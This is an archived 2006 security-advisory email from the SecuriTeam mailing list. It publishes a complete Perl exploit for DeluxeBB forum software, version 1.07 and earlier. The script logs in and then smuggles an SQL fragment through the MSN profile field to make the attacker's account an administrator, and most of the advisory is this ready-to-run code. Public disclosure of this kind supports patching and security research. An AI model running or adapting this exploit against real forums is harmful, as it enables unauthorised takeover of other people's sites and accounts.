Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | [EXPL] DeluxeBB Create Admin (Exploit) |
|---|---|
| Date: | 8 Aug 2006 14:33:55 +0200 |
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - DeluxeBB Create Admin (Exploit) ------------------------------------------------------------------------ SUMMARY <http://www.deluxebb.com/> DeluxeBB features "lots of security options all over the board (like CP logs, Admin Restrictions, Database Backup System, Email Bot protection, hide email option, user groups) but most important is the speed". The following exploit code can be used to test your system for the vulnerability that allows remote attackers to create a new administrator to the system. DETAILS Vulnerable Systems: * DeluxeBB version 1.07 and prior Immune Systems: * DeluxeBB version 1.08 Exploit: #!/usr/bin/perl # DeluxeBB <= 1.07 Create Admin Exploit # ## www.h4ckerz.com / www.hackerz.ir / www.aria-security.net # ./2006-6-25 ### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net use IO::Socket; use LWP::UserAgent; use HTTP::Cookies; $host = $ARGV[0]; $uname = $ARGV[1]; $passwd = $ARGV[2]; $url = "http://".$host; print q( ########################################################### # DeluxeBB <= 1.07 Create Admin Exploit # # www.hackerz.ir - www.h4ckerz.com # ################### Coded By Hessam-x ##################### ); if (@ARGV < 3) { print " # usage : hx.pl [host&path] [uname] [pass]\n"; print " # E.g : hx.pl www.milw0rm.com/deluxebb/ str0ke 123456\n"; exit(); } print " [~] User/Password : $uname/$passwd \n"; print " [~] Host : $host \n"; print " [~] Login ... "; # Login In DeluxeBB <= 1.07 Create Admin Exploit $xpl = LWP::UserAgent->new() or die; $cookie_jar = HTTP::Cookies->new(); $xpl->cookie_jar( $cookie_jar ); $res = $xpl->post($url.'misc.php', Content => [ "sub" => "login", "name" => "$uname", "password" => "$passwd", "submit" => "Log-in", "redirect" => "", "expiry" => "990090909", ],); if($cookie_jar->as_string =~ /memberpw=(.*?);/) { print "successfully .\n"; } else { print "UNsuccessfully !\n"; print " [-] Can not Login In $host !\n"; print $cookie_jar->as_string; exit(); } # Creat Admin :) $req = $xpl->get($url.'cp.php?sub=settings&xemail=h4x0r@h4x0r.net&xhideemail=0'. '&xmsn=h4x0r\',membercode=\'5&xicq=&xaim=&xyim=&xlocation=&' . 'xsite=&languagex=English&skinx=default&xthetimeoffset=0&xthedateformat=' 'd.m.y&xthetimeformat=12&invisiblebrowse=0&markposts=15&submit=Update'); $tst = $xpl->get($url.'index.php'); if ($tst->as_string =~ /Admin Cp/) { print " [+] You Are Admin Now !!"; } else { print " [-] Exploit Failed !"; } # milw0rm.com [2006-06-25] ADDITIONAL INFORMATION The information has been provided by <mailto:Hessamx@Hessamx.net> Hessam-x. ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | [UNIX] Liblesstif Local Root (Exploit), SecuriTeam |
|---|---|
| Next by Date: | [UNIX] Kerberos Multiple Local Privilege Escalation Vulnerabilities, SecuriTeam |
| Previous by Thread: | [UNIX] Liblesstif Local Root (Exploit), SecuriTeam |
| Next by Thread: | [UNIX] Kerberos Multiple Local Privilege Escalation Vulnerabilities, SecuriTeam |
| Indexes: | [Date] [Thread] [Top] [All Lists] |